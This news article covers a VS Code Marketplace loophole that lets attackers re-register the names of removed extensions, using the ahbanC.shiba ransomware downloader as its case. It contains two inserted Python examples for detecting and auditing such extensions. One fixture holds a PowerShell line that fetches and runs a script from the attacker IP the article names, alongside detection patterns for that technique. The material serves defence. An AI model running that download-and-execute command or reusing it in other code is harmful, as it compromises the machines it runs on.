Malicious VS Code Extensions Exploit Marketplace Loophole

Cybersecurity researchers have uncovered a loophole in Microsoft's Visual Studio Code (VS Code) Marketplace that lets attackers re-register the names of removed extensions, potentially allowing malware to slip into developer workflows under the guise of trusted tools.

Researchers at the supply chain security firm ReversingLabs (RL) uncovered the issue in June while tracking a malicious extension called ahbanC.shiba. It turned out to have the same capability as two extensions flagged earlier this year, ahban.shiba and ahban.cychelloworld, both of which had already been removed from the Marketplace.

That raised a critical question: if Marketplace rules require every extension name to be unique, how could “shiba” resurface under a different publisher?

How The Attack Works

Like its predecessors, the ahbanC.shiba extension acted as a simple downloader. It registered only one command, shiba.aowoo, which fetched a PowerShell script from a remote server (54.85.145.93).

Depending on the operating system, the script encrypted the files in a testShiba folder and demanded one Shiba Inu token (a cryptocurrency built on Ethereum) as ransom. As in the earlier versions, however, no wallet address was provided, suggesting the ransomware campaign was still in development.
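To make that downloader pattern concrete, here is an added example (not ReversingLabs' code and not the extension's actual source) of an offline triage script for an installed extension: it reads the extension's package.json and JavaScript entry point and flags the combination described above, a contributed command whose handler spawns PowerShell to fetch and run a script from a hard-coded remote address. The manifest and both entry scripts below are constructed for the demo, and `scan_extension_dir` is an assumed helper for running the same checks on a real folder under ~/.vscode/extensions.

```python
"""Offline triage of a VS Code extension for the downloader pattern.

Added example; not ReversingLabs' code and not the real extension's source.
It inspects package.json plus the JavaScript entry point and flags the
combination the article describes: a contributed command whose handler
spawns PowerShell to fetch and run a script from a hard-coded remote host.
"""
import json
import re
from pathlib import Path

# Constructed sample manifest (shape of a real package.json; contents assumed).
SAMPLE_MANIFEST = json.dumps({
    "name": "shiba",
    "publisher": "ahbanC",
    "main": "./extension.js",
    "activationEvents": ["onCommand:shiba.aowoo"],
    "contributes": {"commands": [{"command": "shiba.aowoo", "title": "aowoo"}]},
})

# Constructed sample entry point illustrating the downloader pattern.
SAMPLE_ENTRY = r'''
const vscode = require("vscode");
const { exec } = require("child_process");
function activate(ctx) {
  ctx.subscriptions.push(vscode.commands.registerCommand("shiba.aowoo", () => {
    exec('powershell -c "iwr http://54.85.145.93/p.ps1 | iex"');
  }));
}
module.exports = { activate };
'''

# Constructed benign entry point for comparison: no process spawning, no network.
BENIGN_ENTRY = r'''
const vscode = require("vscode");
function activate(ctx) {
  ctx.subscriptions.push(vscode.commands.registerCommand("hello.world", () => {
    vscode.window.showInformationMessage("Hello World");
  }));
}
module.exports = { activate };
'''

# Regexes for the indicators that together make up the downloader pattern.
SPAWNS_PROCESS = re.compile(r"child_process|\bexec(?:Sync)?\(|\bspawn(?:Sync)?\(")
INVOKES_POWERSHELL = re.compile(
    r"powershell|pwsh|Invoke-Expression|Invoke-WebRequest|\biex\b|\biwr\b", re.I)
REMOTE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")


def triage(manifest_text: str, entry_text: str) -> dict:
    """Return a dict of indicators for one extension; 'suspicious' is the verdict."""
    manifest = json.loads(manifest_text)
    commands = [c["command"] for c in manifest.get("contributes", {}).get("commands", [])]
    result = {
        "extension_id": f"{manifest.get('publisher')}.{manifest.get('name')}",
        "commands": commands,
        "spawns_process": bool(SPAWNS_PROCESS.search(entry_text)),
        "invokes_powershell": bool(INVOKES_POWERSHELL.search(entry_text)),
        "remote_hosts": sorted(set(REMOTE_IP_URL.findall(entry_text))),
    }
    # A process spawn alone is common in legitimate tooling; the verdict needs
    # it combined with a shell interpreter or a raw-IP download target.
    result["suspicious"] = result["spawns_process"] and (
        result["invokes_powershell"] or bool(result["remote_hosts"])
    )
    return result


def scan_extension_dir(ext_dir: str) -> dict:
    """Run triage() on a real extension folder (assumed layout: package.json + 'main')."""
    root = Path(ext_dir)
    manifest_text = (root / "package.json").read_text(encoding="utf-8")
    main = json.loads(manifest_text).get("main", "./extension.js")
    entry_path = root / main
    if entry_path.is_dir():  # 'main' may point at a directory; use its index.js
        entry_path = entry_path / "index.js"
    if entry_path.suffix == "":
        entry_path = entry_path.with_suffix(".js")
    return triage(manifest_text, entry_path.read_text(encoding="utf-8", errors="replace"))


if __name__ == "__main__":
    for label, entry in (("sample", SAMPLE_ENTRY), ("benign", BENIGN_ENTRY)):
        print(label, triage(SAMPLE_MANIFEST, entry))
```

The checks are deliberately conservative: spawning a process is normal for linters and formatters, so the verdict only fires when it is paired with a PowerShell invocation or a download from a bare IP address. A bundled or minified entry point will defeat simple regexes, which is a reason to treat a single contributed command plus a large opaque bundle as worth a manual look.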

When ahban.shiba and ahban.cychelloworld were removed, the researchers assumed their names would be permanently retired. Instead, just weeks later in late March, a new extension, ahbanC.shiba, appeared on the Marketplace carrying the same malicious code as its predecessors. This proved that removed extension names on the VS Code Marketplace were not locked away at all, but could be freely reused.

The Hidden Marketplace Loophole

To understand why this happened, RL dug into the Marketplace's extension management system. The investigation revealed that the issue lies in how the Marketplace handles extension takedowns. Publishers have two options: unpublish or remove.

  • Unpublished extensions disappear from the Marketplace but remain tied to their original name and statistics. They cannot be republished by anyone else; in other words, nobody else can claim the name.
  • Removed extensions, however, are completely wiped from the Marketplace. Their names become available again, allowing anyone, including malicious actors, to claim them and publish malicious code under the same name.

In other words, once an extension is removed, its trusted name is effectively up for grabs. RL confirmed this by successfully publishing test extensions under names tied to previously removed packages, including ones with a history of malware, such as Solidity-Ethereum.

A Wider Problem In Open-Source Ecosystems

This isn't the first time name reuse has been exploited. In early 2023, RL found that the Python Package Index (PyPI) also allowed the reuse of names of deleted packages. One malicious package, termcolour, reappeared years after the original legitimate one was removed.

While PyPI has since implemented restrictions to prevent reuse of names associated with malicious packages, the VS Code Marketplace has no such protection in place.

“The discovery of this loophole exposes a new threat: that the name of any removed extension can be reused, and by anyone. That means that if some legitimate and very popular extension is removed, its name is up for grabs,” wrote Lucija Valentić, Software Threat Researcher at ReversingLabs, in a blog post.

What Developers Can Do

While Microsoft has yet to announce a fix for the loophole, security experts stress that developers must remain vigilant. They recommend carefully vetting extensions before installation, even when the names look familiar, and verifying the publisher account rather than relying on the extension name alone.

Further, continuous monitoring of dependencies with security tools that can detect malicious packages is also advised. Developers can also make use of platforms that offer free risk assessments across multiple repositories, including the VS Code Marketplace.
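The practical consequence of the unpublish-versus-remove behaviour above, and of the advice to verify publishers rather than names, is that any pin or allowlist must bind an extension's name to its publisher. The following is an added example (not code from ReversingLabs or Microsoft) that records name-to-publisher pins from a machine whose extensions were vetted and then audits another machine's listing against them, flagging the loophole case of a familiar name arriving from a different publisher. The input format is that of `code --list-extensions --show-versions` (publisher.name@version per line); both listings below are constructed, and `vetted-pub`, `other-pub` and `somepub` are made-up publisher names.

```python
"""Audit installed VS Code extensions against pinned publishers.

Added example; not code from ReversingLabs or Microsoft. Because a removed
extension's name can be re-registered by a different publisher, a pin must
bind the name to the publisher, not merely record the name. Input is the
format printed by `code --list-extensions --show-versions`
(publisher.name@version, one per line); all listings below are constructed.
"""
import re
from dataclasses import dataclass

# One line of `code --list-extensions --show-versions` output.
LINE_RX = re.compile(
    r"^(?P<publisher>[A-Za-z0-9][\w-]*)\.(?P<name>[A-Za-z0-9][\w-]*)(?:@(?P<version>\S+))?$")


@dataclass(frozen=True)
class Finding:
    extension_id: str
    status: str      # "ok", "publisher_mismatch", "unpinned" or "unparsed"
    detail: str


def pins_from_listing(listing_text: str) -> dict:
    """Build name -> publisher pins from a listing taken on a vetted machine."""
    pins = {}
    for line in listing_text.splitlines():
        m = LINE_RX.match(line.strip())
        if m:
            # Extension IDs are case-insensitive, so normalise both parts.
            pins[m["name"].lower()] = m["publisher"].lower()
    return pins


def audit(listing_text: str, pins: dict) -> list:
    """Compare an installed-extension listing against the pins."""
    findings = []
    for raw in listing_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RX.match(line)
        if not m:
            findings.append(Finding(line, "unparsed", "not publisher.name@version"))
            continue
        publisher, name = m["publisher"], m["name"]
        ext_id = f"{publisher}.{name}"
        expected = pins.get(name.lower())
        if expected is None:
            findings.append(Finding(ext_id, "unpinned", "no vetted publisher recorded for this name"))
        elif expected != publisher.lower():
            # The loophole case: familiar name, different publisher.
            findings.append(Finding(ext_id, "publisher_mismatch",
                                    f"name '{name}' was vetted from publisher '{expected}'"))
        else:
            findings.append(Finding(ext_id, "ok", ""))
    return findings


# Constructed listing from a machine whose extensions were vetted.
VETTED_LISTING = """\
ms-python.python@2024.22.0
dbaeumer.vscode-eslint@3.0.10
vetted-pub.my-linter@1.4.0
"""

# Constructed listing from a machine to audit: my-linter now comes from a
# different publisher (the name-reuse case) and one extension was never vetted.
AUDITED_LISTING = """\
ms-python.python@2024.22.0
dbaeumer.vscode-eslint@3.0.10
other-pub.my-linter@1.4.1
somepub.tool@0.1.0
"""

if __name__ == "__main__":
    for f in audit(AUDITED_LISTING, pins_from_listing(VETTED_LISTING)):
        print(f"{f.status:<18} {f.extension_id}  {f.detail}")
```

Capture the pins once with `code --list-extensions --show-versions > vetted.txt` on a machine you trust, commit that file alongside the project, and run the audit on every other developer workstation or CI image; a `publisher_mismatch` on a name you recognise is exactly the signal the article says a name-only check would miss.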

“The lesson to be learned from this campaign is that it's important to remember that many dangers are lurking on VS Code Marketplace and other open-source repositories. It is essential for developers and users of these platforms to be mindful and aware of what is being included in the development cycle,” Valentić concluded.

Kavita Iyer (https://www.techworm.net)
An individual, optimist, homemaker, foodie, a die hard cricket fan and most importantly one who believes in Being Human!!!